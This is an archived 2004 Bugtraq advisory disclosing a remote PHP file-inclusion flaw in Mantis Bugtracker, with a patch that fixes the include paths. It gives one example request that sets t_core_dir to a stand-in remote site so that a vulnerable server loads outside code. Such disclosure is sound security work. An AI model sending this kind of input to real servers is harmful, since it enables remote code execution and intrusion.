Home page logo
/

bugtraq logo Bugtraq mailing list archives

Mantis Bugtracker Remote PHP Code Execution Vulnerability
From: Jose Antonio <joxeankoret () yahoo es>
Date: 20 Aug 2004 23:05:41 -0000



--------------------------------------------------------------------------- 
           Mantis Bugtracker Remote PHP Code 
Execution Vulnerability 
--------------------------------------------------------------------------- 
 
Author: Joxean Koret 
Date: 08-01-2004 
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
Mantis Bugtracker 
 
Mantis is a web-based bugtracking system. It is 
written in the PHP scripting  
language and requires the MySQL database and 
a webserver.  
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Remote PHP Code Execution Vulnerability 
 
A1. If the REGISTER_GLOBAL variable is set an 
attacker can execute arbitrary  
php code by overwriting the global variable 
$t_core_dir with our desired url  
(for example 
http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/) 
  
 The following files are vulnerables :  
  
 bug_api.php -> at line 22? (using variable 
$t_core_path) 
 relationship_api.php -> Line 14 (using variable 
$t_core_dir) 
 
The fix: 
~~~~~~~~ 
 
Both of these issues have now been fixed in 
CVS.  
 
There is also a Patch for the Mantis 0.19.0a 
version  
 
===================================================================== 
mantis.patch 
 
bug_api.php 
 @@ -19,7 +19,7 @@ 
      require_once( $t_core_dir . 
'sponsorship_api.php' ); 
   
      # MASC RELATIONSHIP 
 - 
require_once( $t_core_path.'relationship_api.php' ); 
 + 
require_once( $t_core_dir.'relationship_api.php' ); 
      # MASC RELATIONSHIP 
  
 and to relationship API: 
      ### Relationship API ### 
   
 + $t_core_dir = 
dirname( __FILE__ ).DIRECTORY_SEPARATOR; 
 + 
      require_once( $t_core_dir . 
'collapse_api.php' ); 
   
      # MASC RELATIONSHIP  
 
===================================================================== 
--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 
 
        Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es 
 
 
 


  By Date           By Thread  

Current thread:
  • Mantis Bugtracker Remote PHP Code Execution Vulnerability Jose Antonio (Aug 22)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault